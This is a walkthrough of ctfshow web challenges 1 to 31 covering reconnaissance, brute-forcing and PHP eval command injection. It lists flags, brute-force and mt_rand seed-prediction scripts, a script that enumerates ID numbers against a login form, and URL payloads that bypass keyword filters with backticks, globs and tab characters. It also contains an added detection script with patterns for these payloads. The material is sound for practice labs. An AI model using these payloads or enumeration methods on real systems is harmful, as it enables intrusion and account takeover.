Information Gathering
web1[html]
View the page source.
ctfshow{874c4342-435b-40e6-96a7-b37ddf723161}
web2[html]
Right-click is disabled, so press Ctrl+U directly, or prefix the URL in the address bar with view-source:.
ctfshow{a3bc8e02-09ce-4cc2-a429-72bd55d9b3f0}
web3[header]
Analyse the HTTP traffic.
ctfshow{823de946-8869-473e-8a99-82ca91f4085b}
web4[robots.txt]
Look at robots.txt.
I suggest saving a bookmarklet so it can be opened quickly:
javascript:window.location = document.location.protocol + "//" + document.location.host + "/robots.txt";
ctfshow{12de0686-8909-4772-a2b6-b05c55b74215}
web5[.phps]
Visit ./index.phps
ctfshow{07083375-5d54-4ca9-8fcf-001f8c8cba32}
web6[www.zip]
Visit ./www.zip; inside it is fl000g.txt, so visit ./fl000g.txt
ctfshow{1034d16a-721d-4805-83a7-0446a9aa0e5c}
web7[.git/]
Visit ./.git/
ctfshow{63f0f59c-697d-48de-bd60-d9da6f49c7d5}
web8[.svn/]
Visit ./.svn/
ctfshow{daf35dcb-81bf-43a0-8d79-797f16e84555}
web9[.swp]
Visit ./index.php.swp
ctfshow{d3d4c281-86c4-464b-a2ae-6fa6d01b2907}
web10[cookie]
Check the cookie; I used the Web Developer extension for this.
ctfshow{afbdb2ad-1b92-4f2b-ac21-b3c3358a7500}
web11[domain TXT record]
nslookup -qt=TXT ctfshow.com
flag{just_seesee}
web12[social engineering]
Visit ./admin/; it requires a login. Guess that the username is admin and the password is 372619038, the number in the footer of the home page.
ctfshow{e5c0e24d-f03d-4df9-b4db-3b3f3734fc53}
web13[site template]
There is documentation linked in the page footer. Following it, visit ./system1103/login.php and log in with admin/admin1103.
ctfshow{463d8523-8432-4297-b738-27d9fb837068}
web14[KindEditor 4.1.11]
Vulnerability precondition: the configured file-space directory does not exist.
Visit ./editor/, click Insert File, choose File Space, and the flag turns up at /var/www/html/nothinghere/fl000g.txt.
So visit ./nothinghere/fl000g.txt
ctfshow{04cc465c-cbf8-4244-824a-284c038f66f5}
web15[social engineering]
Visit ./admin/; there is a forgot-password option.
Look up the QQ number from the QQ mailbox in the footer of the home page; the profile shows 陕西 西安 新城区 (Shaanxi / Xi'an / Xincheng District).
Try them one by one; 西安 (Xi'an) works and the password is reset to admin7789. Log in.
ctfshow{f2779cd5-a648-4ac4-bd00-4f38437d7aad}
web16[PHP probe]
Visit ./tz.php; a server probe is present. Find the phpinfo option in it.
ctfshow{5462980d-256a-470a-a818-b9e19ab09fc6}
web17[domain resolution history]
Find any site that offers IP history lookups; I used https://viewdns.info/iphistory/.
Exclude the previous owner's records and the provider's overseas records; the first remaining IP is, in the usual case, the real IP.
flag{111.231.70.44}
web18[js]
Look at the JS; there is a score check. Run it in the console to get the hint 110.php
ctfshow{326d5b86-f2f6-4b58-a63f-5c4017a1dcfe}
web19[source comments]
View the HTML; a comment was left in, giving the account admin. The password, however you look at it, is encrypted.
Looking further up at the POST code, it is AES-CBC encryption; the key and IV are both given, so just decrypt it.
Log in with the decrypted password.
ctfshow{ae62164b-4665-4385-99c3-2637a245f6c6}
web20[.mdb]
Visit ./db/db.mdb and look through the file.
flag{ctfshow_old_database}
Brute-forcing
web21[Base Auth]
Just brute-force it with Burp. Note that Burp's filter does not refresh the results automatically; you have to re-apply the filter manually.
ctfshow{67950f5e-5f73-4ed1-a3b4-3f6b176784fd}
web22[subdomain]
This challenge is broken at the moment; I will come back to it later.
web23[PHP basics]
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 11:43:51
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);
}
?>
Write a script to brute-force it.
<?php
// Try every two-character alphanumeric token and return the first one whose
// md5 satisfies the same two conditions the challenge checks.
function fuck() {
    foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $i){
        foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $j){
            $Gtoken = $i.$j;
            $token = md5($Gtoken);
            if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
                if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
                    return $Gtoken;
                }
            }
        }
    }
    return "";
}
echo fuck();
// ZE
ctfshow{f16c4894-48b4-41dd-bf26-e6c3a45a8af8}
web24[mt_srand]
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:26:39
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 13:53:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
?>
Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021
PHP's mt_rand() numbers are generated from the seed, so knowing the seed is equivalent to knowing the entire sequence of random numbers that follows.
<?php
mt_srand(372619038);
echo mt_rand();
//1155388967
web25[mt_srand]
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:56:57
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021
First request ./?r=0 to get the negative of the first mt_rand() value: 748251799.
Then use php_mt_seed to brute-force the seed. It gives six candidate seeds for different system environments. Since I did the previous challenge in a PHP 7 environment without any problem, I used PHP 7 to verify them.
<?php
// Re-seed with each candidate from php_mt_seed; for the seed whose first
// mt_rand() equals 748251799, return the token the challenge expects
// (the sum of the next two mt_rand() values).
function fuck($i){
    mt_srand($i);
    $f = mt_rand();
    if ($f == 748251799){
        return mt_rand()+mt_rand();
    }
}
echo fuck(1448670724)."\n";
echo fuck(1448670725)."\n";
echo fuck(575534922)."\n";
echo fuck(608125702)."\n";
echo fuck(2575729271)."\n";
echo fuck(2656555094)."\n";
//3356577139
//1337536129
Then set the cookie and visit ./?r=748251799; with token=3356577139 you get the flag.
ctfshow{38496b53-16d2-40de-b529-af298b6c4b4a}
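As an added example (not from the write-up), here is a pure-Python model of PHP 7.1+'s mt_srand()/mt_rand() covering both web24 and web25: it shows why a known seed reproduces the whole sequence, and it carries the web25 check (first output compared with ?r=, token = second + third output) through for any seed. The MT19937 constants are the standard ones; the seed 372619038 is the one from the page. The defender's takeaway is that any security-relevant value must come from random_int()/random_bytes(), never from a seeded mt_rand().

```python
# MT19937 as PHP 7.1+ uses it: same state setup, same twist, and mt_rand()
# with no arguments returns the tempered 32-bit word shifted right by one.
N, M = 624, 397
MASK32 = 0xFFFFFFFF

def mt19937_state(seed):
    """init_genrand(): the whole 624-word state is a pure function of the seed."""
    mt = [seed & MASK32]
    for i in range(1, N):
        prev = mt[i - 1]
        mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & MASK32)
    return mt

def mt19937_twist(mt):
    """Regenerate all 624 words in place (the standard in-place update)."""
    for i in range(N):
        y = (mt[i] & 0x80000000) | (mt[(i + 1) % N] & 0x7FFFFFFF)
        mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)

def mt19937_temper(y):
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    return (y ^ (y >> 18)) & MASK32

def mt19937_outputs(seed, count):
    """First `count` raw 32-bit outputs of the generator for a given seed."""
    mt, index, out = mt19937_state(seed), N, []
    for _ in range(count):
        if index >= N:
            mt19937_twist(mt)
            index = 0
        out.append(mt19937_temper(mt[index]))
        index += 1
    return out

def php_mt_rand(seed, count):
    """Values of `count` successive mt_rand() calls after mt_srand(seed) on PHP 7.1+."""
    return [w >> 1 for w in mt19937_outputs(seed, count)]

def web25_token(seed):
    """The web25 logic: first value is checked against ?r=, the cookie token is 2nd + 3rd."""
    first, second, third = php_mt_rand(seed, 3)
    return first, second + third

if __name__ == "__main__":
    # web24 seed from the page; compare the printed value with the one the write-up reports
    print(php_mt_rand(372619038, 1)[0])
    print(web25_token(372619038))
```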
web26[packet capture]
This one is odd: simply capturing the request gives the flag.
ctfshow{a0bd74a4-1739-4053-bb15-0a35f5bef6b7}
web27[account enumeration]
It turns out to be an academic-affairs system. My first thought was whether the publicly listed student information at the bottom could be used to obtain an account and password directly.
Then I tried brute-forcing a valid ID number using the ID check digit.
import requests


def checkIDNumber(num_str):
    # Validate the check digit of an 18-digit Chinese ID number (weights 2^(17-i) mod 11)
    str_to_int = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5,
                  '6': 6, '7': 7, '8': 8, '9': 9, 'X': 10}
    check_dict = {0: '1', 1: '0', 2: 'X', 3: '9', 4: '8', 5: '7',
                  6: '6', 7: '5', 8: '4', 9: '3', 10: '2'}
    assert len(num_str) == 18
    check_num = 0
    for index, num in enumerate(num_str):
        if index == 17:
            right_code = check_dict.get(check_num % 11)
            if num == right_code:
                return True
            else:
                return False
        check_num += str_to_int.get(num) * (2 ** (17 - index) % 11)


if __name__ == '__main__':
    # Enumerate birth dates, keep only candidates with a valid check digit, and query each
    for year in range(1990, 2000):
        for month in range(1, 13):
            for day in range(1, 32):
                # print(str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:])
                num_str = '621022' + str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:] + '5237'
                if checkIDNumber(num_str):
                    data = {
                        'a': '高先伊',
                        'p': num_str,
                    }
                    r = requests.post("http://9b942f9a-035b-41a3-9a76-2519aec7e97e.chall.ctf.show:8080/info/checkdb.php", data=data).json()
                    if r['0'] != "error":
                        print(num_str)
ctfshow{02c2feb9-db89-44c6-9e81-eec7c6e50d77}
web28[directory brute-force]
I was fairly lost at first: I knew the file location had to be brute-forced, but that is like looking for a needle in a haystack. There was no hint at the time, and I tried three or four path formats before it worked. Now just brute-force it following the format the hint gives.
from requests import get


def fuck():
    # Walk /i/j/ for i, j in 0..99 and stop at the first path that is not 403
    for i in range(0, 100):
        for j in range(0, 100):
            print(i, j)
            if get(f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/", allow_redirects=False).status_code != 403:
                return f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/"


if __name__ == '__main__':
    print(fuck())
# http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/72/20/
ctfshow{60b39b18-e70c-4cd0-a5e4-7deb336af1f6}
Command Execution
web29
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
There are many approaches; two are shown here. (Because of the browser's HTML parsing, the PHP tags in the response get treated as a comment, so always check the raw HTML to be sure you are seeing the real response.)
// payload
List files
/?c=echo%20`ls`;
/?c=eval($_GET['d']);&d=echo `ls`;
Read the file
/?c=echo `cat fla*`;
/?c=echo `cat fla?.php`;
/?c=eval($_GET['d']);&d=echo `cat flag.php`;
ctfshow{1d5d8d07-8623-4437-80f2-5a2454b9f36d}
web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The payloads from the previous challenge can be reused here, because we used backticks in place of system. As for the filter on php in the file name, two of the payloads above do not contain php at all.
ctfshow{bb6d3fc9-9491-46bd-884b-1c7a4fd2c15f}
web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
This one filters the space and the single quote ', so none of the payloads above work any more. No big deal: the tab character %09 can stand in for the space.
// payload
List files
/?c=echo%09`ls`;
Read the file
/?c=echo%09`/bin/ca*%09fla*`;
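The web29 to web31 filters fail because they match a few literal keywords against a single decoded parameter, while the payloads above swap in backticks, globs and %09. As an added example (not from the write-up), here is defender-side detection logic that reads constructed access-log lines, percent-decodes every query parameter, and flags the patterns these three challenges rely on; the log lines and the indicator names are my own, not anything from the challenge server.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines; the query strings mirror the payload shapes
# shown for web29-web31 plus two ordinary requests that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /?c=echo%20`ls`; HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /?c=eval($_GET['d']);&d=echo%20`cat%20flag.php`; HTTP/1.1" 200 77
10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] "GET /?c=echo%09`/bin/ca*%09fla*`; HTTP/1.1" 200 77
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2021:10:00:04 +0000] "GET /search?q=cat%20pictures HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\w+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Matched against the DECODED value: the challenge regexes also saw the decoded
# value and were still bypassed, so detection keys on structure (backticks,
# dangerous calls, chained superglobals, non-space whitespace, globs), not on
# words like "flag" or "cat" that a glob or a different command can avoid.
INDICATORS = {
    "backtick_exec": re.compile(r"`[^`]*`"),
    "dangerous_call": re.compile(r"\b(eval|system|exec|passthru|shell_exec|popen|assert)\s*\(", re.I),
    "nested_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I),
    "tab_separator": re.compile(r"[\t\x0b\x0c\r\n]"),
    "glob_in_command": re.compile(r"`[^`]*[*?][^`]*`"),
}

def analyze_log(text):
    """Return one finding per flagged parameter: ip, parameter name, decoded value, indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = unquote(raw)  # parse_qsl decoded once; decode again for double-encoding
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
            if hits:
                findings.append({"ip": m["ip"], "param": name, "value": value, "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ip"], f["param"], f["indicators"], repr(f["value"]))
```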